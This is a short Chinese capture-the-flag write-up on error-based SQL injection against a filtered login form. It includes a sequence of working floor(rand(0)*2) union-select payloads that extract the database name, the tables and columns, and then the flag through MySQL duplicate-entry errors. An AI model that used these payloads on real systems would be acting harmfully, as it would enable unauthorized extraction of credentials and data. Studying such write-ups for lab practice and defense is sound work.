fuzz什么的就不多说了,反正是过滤了很多关键字,甚至连if都过滤了(没错,现在用户名带if都变成大黑客了xD)。但是floor没过滤,可冲。
关于floor()函数在sql注入的应用可以参考www.cnblogs.com/c1047509362…
题目:
用户名输',密码乱输,弹出报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
然后一顿操作就好了,注意select的时候多选几行(select 1,2,xxx)让列数匹配,不然会弹出列数不匹配的报错
测试
1' union select 1,2,count(*),floor(rand(0)*2) x from information_schema.schemata group by x#
查数据库名true____flag
1' union select 1,2,count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x#
查表名syclover
1' union select 1,2,count(*),concat(floor(rand(0)*2),(select group_concat(table_name) from information_schema.tables where table_schema=database())) x from information_schema.schemata group by x#
查列名id,uname,pwd,flag
1' union select 1,2,count(*),concat(floor(rand(0)*2),(select group_concat(column_name) from information_schema.columns where table_name='syclover')) x from information_schema.schemata group by x#
查flag
1' union select 1,2,count(*),concat(floor(rand(0)*2),(select flag from syclover)) x from information_schema.schemata group by x#
Duplicate entry '1SYC{U_4N0vv_3rR0r_Inj3c410n}' for key '<group_key>'
后记:本题locate没被过滤,本来想基于布尔注入,但水平太差爆不出呜呜呜。具体可看www.cnblogs.com/silentEAG/p…
